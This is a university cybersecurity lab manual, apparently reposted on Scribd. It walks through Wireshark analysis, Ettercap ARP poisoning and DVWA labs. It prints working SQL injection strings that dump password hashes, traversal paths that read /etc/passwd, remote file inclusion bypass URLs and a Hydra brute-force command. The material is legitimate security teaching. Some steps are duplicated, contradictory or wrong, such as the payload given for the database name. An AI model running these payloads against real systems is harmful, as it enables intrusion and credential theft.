Scribd
Upload
206 views

CSE Cyber Security LAB Manual

asssignment cyber security

Uploaded by

indiansinnings
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
206 views

CSE Cyber Security LAB Manual

asssignment cyber security

Uploaded by

indiansinnings
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 59

KIET Group of Institutions, Ghaziabad

Department of CSE (AI) and CSE (AI&ML)

LAB MANUAL

Department of CSE (AI) and CSE (AI&ML)

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

LIST OF EXPERIMENTS

Module 1: Packet Analysis using Wire shark


1. Basic Packet Inspection: Capture network traffic using Wire shark and analyze basic protocols like HTTP,
DNS, and SMTP to understand how data is transmitted and received.
2. Detecting Suspicious Activity: Analyze network traffic to identify suspicious patterns, such as repeated
connection attempts or unusual communication between hosts.
3. Malware Traffic Analysis: Analyze captured traffic to identify signs of malware communication, such as
command-and-control traffic or data infiltration.
4. Password Sniffing: Simulate a scenario where a password is transmitted in plaintext. Use Wireshark to
capture and analyze the packets to demonstrate the vulnerability and the importance of encryption.
5. ARP Poisoning Attack: Set up an ARP poisoning attack using tools like Ettercap. Analyze the captured
packets to understand how the attack can lead to a Man-in-the-Middle scenario.

Module 2: Web Application Security using DVWA


1. SQL Injection: Use DVWA to practice SQL injection attacks. Demonstrate how an attacker can
manipulate input fields to extract, modify, or delete database information.
2. Cross-Site Scripting (XSS): Exploit XSS vulnerabilities in DVWA to SQL Injection: Use DVWA to
practice SQL injection attacks. Demonstrate how an attacker can manipulate input fields to extract, modify,
or delete database information.
inject malicious scripts into web pages. Show the potential impact of XSS attacks, such as stealing cookies
or defacing websites.
3. Cross-Site Request Forgery (CSRF): Set up a CSRF attack in DVWA to demonstrate how attackers can
manipulate authenticated users into performing unintended actions.
4. File Inclusion Vulnerabilities: Explore remote and local file inclusion vulnerabilities in DVWA. Show
how attackers can include malicious files on a server and execute arbitrary code.
5. Brute-Force and Dictionary Attacks: Use DVWA to simulate login pages and demonstrate brute-force and
dictionary attacks against weak passwords. Emphasize the importance of strong password policies

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Experiment 1
Aim: Capture network traffic using Wireshark and analyze basic protocols like HTTP, DNS and SMTP to
understand how data is transmitted and received.
Software Used: Wireshark
Procedure:
1. https://www.wireshark.org/
Download wireshark app and install it.
2. Select a network on which data is being transmitted and received like wi-fi n/w or ethernet.
3. To start or stop the traffic on the network, press ctrl+E.
4. In data packet capturing on top frame, what you will see:
Number | Time | Source | Destination | Protocol | Length | Info
Middle frame example:
 Frame
 Linux cooked capture
 Internet protocol version, Source, Destination,
 Transmission control protocol, src port, dst port, seq. length
WIRESHARK FILTERS
There are two ways to filter:
 Build the filter via the fancy GUI (Expression button)
 Type of filter into the “Apply a display filter” entry field (below the toolbar)
 https://wiki.wireshark.org/DisplayFilters
MOST COMMON WIRESHARK FILTERS
 ip.src==192.168.246.154
 ip.dst==192.168.246.154
 tcp.srcport==443
 tcp.port eq=80
Filter for http and https traffic:
 Tcp.port==443 or tcp.port==80
 ssl or http
 tcp.port in {80 443 8080}
 tcp.port==80 || tcp.port==443 || tcp.port==8080
MOST COMMON WIRESHARK FILTERS
Filter for protocol:
tcp
udp
dns

IP address:
ip.addr==192.168.1.1
! (ip.addr==192.168.1.1)

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Bottom frame:
 Data
MOST COMMON WIRESHARK FILTERS
Example for web traffic:
 http.request.uri==”website name”
 https://demo.testfire.net
 http.response.code==200
 http.request.method==”GET”
 tcp contains “admin”
Output:

Fig.1: Viewing a packet capture in Wireshark

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Figure 2: Drilling down into a packet to identify a network problem using Wireshark

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Figure 3: Wireshark capturing packets

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Experiment 2

Objective - Detecting Suspicious Activity: Analyze network traffic to identify suspicious patterns.
Tool Used: Open WireShark
Procedure –
1. Open Wireshark.

2. Goto Wi-Fi.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

3. Goto Statistics  Protocol Hierarchy

4. On inspection of the protocol hierarchy, if the ‘Data’ tab is not visible, no suspicious activity is
detected as per Wireshark.

Output -
1. On inspection of the protocol hierarchy, if the ‘Data’ tab is visible, no suspicious activity is detected
as per Wireshark. File 1.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

2. If ‘Data’ section is visible, it could be suspicious traffic. Right click  Apply as Filter  Selected.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Experiment 3

Objective - Malware Traffic Analysis: Analyze captured traffic to identify signs of malware
communication.

Tool Used: WireShark

Procedure –
5. Open Wireshark.

6. Goto Wi-Fi.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

7. Goto File  Export Objects  HTTP

8. Files visible as ‘application’ could be a malware - virus.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

9. Select any such file and save it.

Output -
3. Goto Virustotal.com and upload the saved file there to inspect for any possible malwares.

4. If file is safe, it will be visible as -


13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206
Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

5. If file is safe, it will be visible as -

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Experiment – 4
Objective - Malware Traffic Analysis: Analyze captured traffic to identify signs of malware
communication.

Tool Used: WireShark

Procedure –
1. Open Wireshark.

2. Goto Wi-Fi.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

10. Goto File  Export Objects  HTTP

3. Files visible as ‘application’ could be a malware - virus.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

4. Select any such file and save it.

Output -
6. Goto Virustotal.com and upload the saved file there to inspect for any possible malwares.

7. If file is safe, it will be visible as -


13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206
Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

8. If file is safe, it will be visible as -

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Experiment 05
Aim: ARP Poisoning Attack: Set up an ARP poisoning attack using tools like Ettercap. Analyze the
captured packets to understand how the attack can lead to a Man-in-the-Middle scenario.

Tool Used: Ettercap

Brief Theory: ARP spoofing is an attack against an Ethernet or Wi-Fi network to get between the router
and the target user. In an ARP-spoofing attack, messages meant for the target are sent to the attacker
instead, allowing the attacker to spy on, deny service to, or man-in-the-middle a target. One of the most
popular tools for performing this attack is Ettercap, which comes preinstalled on Kali Linux.

On a regular network, messages are routed over Ethernet or Wi-Fi by associating the MAC address of a
connected device with the IP address used to identify it by the router. Usually, this happens via an address
resolution protocol (ARP) message indicating which device's MAC address goes with which IP address. It
lets the rest of the network know where to send traffic — but it can be easily spoofed to change the way
traffic is routed.
In an ARP-spoofing attack, a program like Ettercap will send spoofed messages attempting to get nearby
devices to associate the hacker's MAC address with the IP address of the target. When successful, they're
stored temporarily in a configuration setting on other network devices. If the rest of the network starts
delivering packets intended for the target to the attacker instead, the attacker effectively controls the
target's data connection.

Procedure:

Step 1: Connect to the Network


The first step of ARP spoofing is to connect to the network you want to attack. If you're attacking an
encrypted WEP, WPA, or WPA2 network, you'll need to know the password. This is because we're
attacking the network internally, so we need to be able to see some information about the other hosts on
the network and the data passing within it.

You can connect to a network for ARP spoofing in two ways. The first is to connect via Ethernet, which is
very effective but may not always be practical and is rarely subtle. Instead, many people prefer to use a
wireless network adapter and perform the ARP spoofing over Wi-Fi.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Step 2: Start Ettercap


In Kali, click on "Applications," then "Sniffing & Spoofing," followed by "ettercap-graphical."
Alternatively, click on the "Show Applications" option in the dock, then search for and select "Ettercap."
Once it starts up, you should find yourself on the Ettercap main screen. You'll see the spooky Ettercap
logo, and a few drop-down menus to start the attack from. In the next step, we'll start exploring the "Sniff"
menu.

Step 3: Select Network Interface to Sniff On


Click on the "Sniff" menu item, and then select "Unified sniffing." A new window will open asking you to
select which network interface you want to sniff on. You should select the network interface that is
currently connected to the network you're attacking.

Now, you'll see some text confirming that sniffing has started, and you'll be able to access more advanced
menu options such as Targets, Hosts, Mitm, Plugins, etc. Before we get started using any of them, we'll
need to identify our target on the network.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Identify Hosts on a Network


To find the device we want to attack on the network, Ettercap has a few tricks up its sleeve. First, we can
do a simple scan for hosts by clicking "Hosts," then "Scan for hosts." A scan will execute, and after it
finishes, you can see the resulting hosts Ettercap has identified on the network by clicking "Hosts," then
"Hosts list."

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Once in the Connections view, you can filter the connections by IP address, type of connection, and
whether the connection is open, closed, active, or killed. This gives you a lot of snooping power, which
can be augmented by clicking the "View," then "Resolve IP addresses." This means Ettercap will try to
resolve the IP addresses it sees other devices on the network connecting to.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

If you want to identify a target on a network and know what they're browsing, look over their shoulder at
what website they're on, and match the website to an IP address with an active connection to the same
website. Otherwise, you can usually tell by the MAC address, as you can look it up online to see the
manufacturer.

Step 5 Select Hosts to Target with ARP Spoofing


Now that we've identified our target's IP address, it's time to add them to a target list. Once we do this,
we'll be telling Ettercap that we want to designate that IP address as one we want to pretend to be, so that
we're receiving messages from the router that were meant to be sent to the target.

Go back to the "Hosts" screen, and select the IP address of the target you want to target. Click the IP
address to highlight it, then click on"Targets," followed by "Target list," to see a list of devices that have
been targeted for ARP spoofing.
13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206
Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Now, we can go to the "Mitm" menu to start our attack on this target.

Step 6 Launch Attack on Targets


Click on the "Mitm" menu, and select "ARP poisoning." A popup will open, and you'll select "Sniff
remote connections" to begin the sniffing attack.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Once this attack has begun, you'll be able to intercept login credentials if the user you're targeting enters
them into a website that doesn't use HTTPS. This could be a router or a device on the network or even a
website that uses poor security.

To try another attack, you can click on "Plugins," then "Load plugins," to show the plugin menu. If you
select the DOS attack, it will begin dropping the packets sent to this target, cutting off their internet
access.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Step 7 Try Intercepting a Password


Now, let's actually try intercepting a password. A website that's great for testing is aavtain.com, which
deliberately uses bad security so that you can intercept credentials. On the target device, navigate
to aavtrain.com. Once it loads, you'll see a login screen you can enter a fake login and password into.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Enter a username and password, then hit "Submit." If Ettercap is successful, you should see the login and
password you typed appear on the attacker's screen!

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

In this result above, we can see that Ettercap successfully ARP poisoned the target and intercepted an
HTTP login request the target was sending to an insecure website.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

EXPERIMENT 06

Aim: SQL Injection: Use DVWA to practice SQL injection attacks. Demonstrate how an attacker can
manipulate input fields to extract, modify, or delete database information.

Tool Used: DVWA installed on Kali Linux

Procedure:
Step 1: Setup DVWA for SQL Injection
After successfully installing DVWA, open your browser and enter the required URL 127.0.0.1/dvwa/login.php Log in using the
username “admin” and password as “password”. These are the default DVWA login credentials. After a successful login, set the
DVWA security to LOW then click on SQL Injection on the left-side menu.

DVWA SQL Injection

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

ALSO READ

How to delete iscsi target from initiator ( CentOS / RHEL 7 ) Linux

Step 2: Basic Injection


On the User ID field, enter “1” and click Submit. That is supposed to print the ID, First_name, and Surname on the screen as you can
see below.

The SQL syntax being exploited here is:

sql

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

D
VWA Basic SQL Injection

Interestingly, when you check the URL, you will see there is an injectable parameter which is the ID. Currently, my URL looks like this:

bash

http://172.16.15.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Let’s change the ID parameter of the URL to a number like 1,2,3,4 etc. That will also return the First_name and Surname of all users
as follows:

bash

ID: 2

First name: Gordon

Surname: Brown

ID: 3

First name: Hack

Surname: Me

ID: 4

First name: Pablo

Surname: Picasso

If you were executing this command directly on the DVWA database, the query for User ID 3 would look like this:

sql

SELECT first_name, last_name FROM users WHERE user_id = '3';

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

S
QL Injection

Step 3: Always True Scenario


An advanced method to extract all the First_names and Surnames from the database would be to use the input: %' or '1'='1'

al
ways true injection

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

The percentage % sign does not equal anything and will be false. The '1'='1' query is registered as True since 1 will always equal 1.
If you were executing that on a database, the query would look like this:

sql

SELECT first_name, last_name FROM users WHERE user_id = '%' or '1'='1';

SQ
L Injection

Step 4: Display Database Version


To know the database version the DVWA application is running on, enter the text below in the User ID field.

bash

%' or 0=0 union select null, version() #

The database version will be listed under surname in the last line as shown in the image below.

ALSO READ

How to bypass CSRF Protection [5 Different Methods]

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Dis
play database version

Step 5: Display Database User


To display the Database user who executed the PHP code powering the database, enter the text below in the USER ID field.

ADVERTISEMENT

bash

%' or 0=0 union select null, user() #

The Database user is listed next to the surname field in the last line as in the image below.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Display database user

Step 6: Display Database Name


To display the database name, we will inject the SQL code below in the User ID field.

bash

%' or 0=0 union select null, user() #

The database name is listed next to the surname field in the last line.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Dis
play database name

Step 7: Display all tables in information_schema


The Information Schema stores information about tables, columns, and all the other databases maintained by MySQL. To display all
the tables present in the information_schema, use the text below.

bash

%' and 1=0 union select null, table_name from information_schema.tables #

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

D
atabase schema

Step 8: Display all the user tables in information_schema


For this step, we will print all the tables that start with the prefix user as stored in the information_schema. Enter the SQL code
below in the User ID.

bash

%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

User tables

Step 9: Display all the columns fields in the information_schema user


table
We will print all the columns present in the users’ table. This information will include column information like User_ID, first_name,
last_name, user, and password. Enter the input in the User_ID field.

bash

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where
table_name = 'users' #

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Colu
mn fields

ALSO READ

How to implement password policy in RHEL Linux with examples

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Step 10: Display Column field contents


To display all the necessary authentication information present in the columns as stored in the information_schema, use the SQL
syntax below:

bash

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

Col
umn fields contents
From the image above, you can see the password was returned in its hashed format. To extract the password, copy the MD5 hash
and use applications like John the Ripper to crack it. There are also sites available on the internet where you can paste the hash and
if lucky, you will be able to extract the password.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Experiment 8
Objective: Set up a CSRF attack in DVWA to demonstrate how attackers can manipulate
authenticated users into performing unintended actions.
Tool Used: DVWA

Brief Theory: About CSRF( Cross Site Request Forgery): CSRF, which stands for Cross-Site Request
Forgery, is a type of attack where someone takes advantage of a user’s active session on a website to make
them unintentionally perform actions they didn’t intend to. This attack works when the user is already logged
into the website or application.

DVWA Security Low

Step: 1- We have to use CSRF php Source code. The flaw in this code is that it lacks proper CSRF protection.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

It allows an attacker to craft a malicious URL and trick a logged-in user into unknowingly executing
unwanted actions on their behalf.

The vulnerability lies in the fact that the code doesn’t include any mechanism to verify the origin of the
request. As a result, an attacker can construct a URL containing the necessary parameters
(password_new and password_conf) and send it to a victim. If the victim clicks on the malicious link while
authenticated on the vulnerable website, the code will execute the password change without any further
authentication or user consent.
Now, We are going to perform the attack
First, I will Create a new password “123” and click on Change

After changing the password you can see in the url is that it lacks the necessary CSRF token. In the absence
of CSRF protection, an attacker can still exploit this vulnerability by tricking the victim into clicking on the
URL while logged in to the vulnerable website.Now we will Display the HTML code for the page, which
includes a link to download a game called “FIFA 2023. and password has been changed by attacker”
If attacker send this link to the victim, the password will be changed.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

If the victim tries to open the html page. It will looks like this….

When victim tries to click on the FIFA link, the password “12345” will be changed automatically
We can see that password has been changed

lo

Security: Medium

First things first, lets change the security level of the DVWA.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

If we try to use low security method then it wont work anymore


The flaw in
this code is a
Cross-Site
Request
Forgery
(CSRF)

vulnerability. The code uses the HTTP Referer header to check if the request came from the same server,
assuming it’s a trusted source. However, the Referer header can be easily manipulated by an attacker. This
allows an attacker to create a malicious website or craft a URL that makes a request to this script, tricking the
user’s browser into performing an unwanted action on their behalf, such as changing their password without
their knowledge or consent.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Can you see the difference? Within the legitimate request we see there is a Referer, where the request came
from. That matches up so the request goes ahead.
So what if we intercept the illegitimate request with Burp and add the HTTP Referer. Like so.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Paasword changed successfully Now we will try to intercept the website and add legitimate Referrer using
burp suite

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Experiment 09

Objective: Explore remote and local file inclusion vulnerabilities in DVWA. Show how attackers can
include malicious files on a server and execute arbitrary code.

Tool Used: DVWA

Brief Theory: Remote File inclusion (RFI) and Local File Inclusion (LFI) are vulnerabilities that are often
found in poorly-written web applications. These vulnerabilities occur when a web application allows the user
to submit input into files or upload files to the server. In order to demonstrate these attacks, we will be using
the Damn Vulnerable Web Application (DVWA).

there are some pre-requisites required:

1. XAMPP

2. Damn Vulnerable Web Application (DVWA)

Local File Inclusion in Action (Difficulty: LOW)Now start your machine and login to DVWA, then go to
DVWA security tab and change the difficulty level to low.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Go to file inclusion tab and change the URL from incude.php to ?page=../../../../../../etc/passwd.

change the URL from?page=../../../../../../etc/passwd to ?page=../../../../../../proc/version.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Difficulty: MEDIUM

Now, go on and try the exploits we used in low difficulty. You will notice that you can’t read files like before
using the directory traversal method. So, as you can see in the below snapshot of source page, the server is
more secure and is filtering the ‘../’ or ‘..\’pattern. Let’s try to access the file without ‘../’ or ‘..\’.

Change include.php to /etc/passwd

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Now,change the URL from?page=/etc/passwd to ?page=/proc/version.

As you can see, it worked by directly entering the name of the file. Let’s level up the difficulty to HIGH.

Difficulty: HIGH

Change the difficulty to HIGH and try all exploits from medium difficulty, and you’ll notice none of them
will works because the target is more secure, as it is only accepting “include.php” or inputs starting with the
word “file”. If you try anything else, it will show “File not Found”.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

In this level of security, we can still gather sensitive info using the “File” URI scheme. (because it starts with
the word “file”)

Change the URL from include.php to ?page=file:///etc/passwd

You will get the data of /etc/passwd file.

This is how you can exploit file inclusion vulnerability using local files on the webserver.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Remote File Inclusion in Action

Now, let’s try to exploit this vulnerability using remote files hosted on the attacker machine.

Difficulty: LOW

Now, Let’s start with the Low difficulty.

Change the difficulty to low and go to file inclusion tab.

Let’s change include.php to http://www.google.com so the final URL will look something like this,

?page=http://www.google.com

Difficulty: MEDIUM

Change the difficulty to medium and check as we did it in the low difficulty. You’ll notice, it’s not working
anymore. The target is now filtering “http” and “https” as shown in source page.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

so try the attack with “HTTP” (in CAPS) or any one word in caps like I used as shown in snapshot (httP)and
it’ll work.

?page=httP://imdb.com

Difficulty: HIGH

We can’t exploit the high difficulty using RFI as you can see in source page,we know that the target web-
server is only accepting “include.php” or anything that’s starting with the word “file” that’s why we can’t
include anything from an outside server.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

Experiment 10
Objective: Use DVWA to simulate login pages and demonstrate brute-force and dictionary attacks against
weak passwords. Emphasize the importance of strong password policies.

Modern brute force attacks can now easily crack 8-characters alphanumeric password in just a mere 2 hours,
while more advanced encryption hashes can be cracked in a few months. This can be achieved by performing
exhaustive key search, in which the computer will try every possible combination of every single possible
character in order to find the right combination of characters as the password. For the purpose of this
demonstration, we will setting up the Damn Vulnerable Web Application (DVWA) to simulate a brute force
attack.
The attack will utilize Hydra as a parallelized login cracker and the ‘rockyou.txt’ wordlist that will be
demonstrated on the login form below.

Initially, barely any information was disclosed. However, a wild guess would be to use one of the most
popular usernames on any web application, which is “admin”. Before proceeding with the attack, we must
first collect more information. Open a Burp Suite browser and direct it to the DVWA page, which will look
exactly like the one on a regular browser. Now, try logging in using a random password. For this attempt, the
13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206
Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

username “admin” and password “admin123” was used. For Burp Suite to scan the web application, turn on
the Intercept mode right before clicking on the “Login” button.

As expected, the credentials entered were wrong, displaying an error message saying, “Username and/or
password incorrect”. Now, head back to Burp Suite and view the raw data of the connection request.

Through this, we have gathered several more information that may be useful (e.g., session cookies,
parameters of the request). The following table includes all the gathered information:

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

The next step is to use Hydra to crack the account password. There is no fixed format to Hydra’s command as
it will depend on the elements and/or information known to the pentester (e.g., username, hostname, URL
service, and cookies). Considering the list of disclosed information and available parameters obtained during
the vulnerability assessment step utilizing Burp Suite, the command used for this demonstration will be:
hydra 127.0.0.1 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form
"/dvwa/vulnerabilities/brute:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=9
cei1q7s10h39gdp538to6f3ut;security=low:F=Username and/or password incorrect."
With the incorporation of all the elements and components listed on the table, Hydra will systematically
attempt the various combinations of passwords from the ‘rockyou.txt’ wordlist in an attempt to crack the
password for the “admin” account.

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

The result of the attack reveals the password to be “password”, which will show that the login is successful

Importance of Strong Password:


Strong password policies are the cornerstone of digital security, acting as the first line of defense against
unauthorized access and cyber threats. Here's why they're crucial:
Protection Against Unauthorized Access: Strong passwords make it significantly harder for hackers to
gain access to your accounts, systems, and sensitive information. They act as a barrier, keeping intruders out
of your digital domain.
Prevention of Data Breaches: Weak passwords are like an open invitation for cybercriminals to exploit. By
enforcing strong password policies, organizations can mitigate the risk of data breaches, safeguarding both
